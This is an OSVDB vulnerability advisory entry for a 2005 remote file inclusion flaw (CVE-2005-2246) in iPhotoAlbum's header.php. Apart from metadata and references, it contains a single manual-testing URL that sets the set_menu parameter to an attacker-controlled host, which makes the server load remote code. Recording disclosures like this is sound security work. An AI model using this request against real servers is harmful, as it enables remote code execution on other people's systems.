iPhotoAlbum header.php set_menu Variable Remote File Inclusion

2005-07-09T11:28:08
ID OSVDB:17890
Type osvdb
Reporter OSVDB
Modified 2005-07-09T11:28:08

Description

Manual Testing Notes

http://[target]/[path_to_iPhotoAlbum]/lib/static/header.php?set_menu=http://[attacker]/

References:

Security Tracker: 1014448 Secunia Advisory ID:16031 Related OSVDB ID: 17889 Mail List Post: http://attrition.org/pipermail/vim/2007-March/001474.html CVE-2005-2246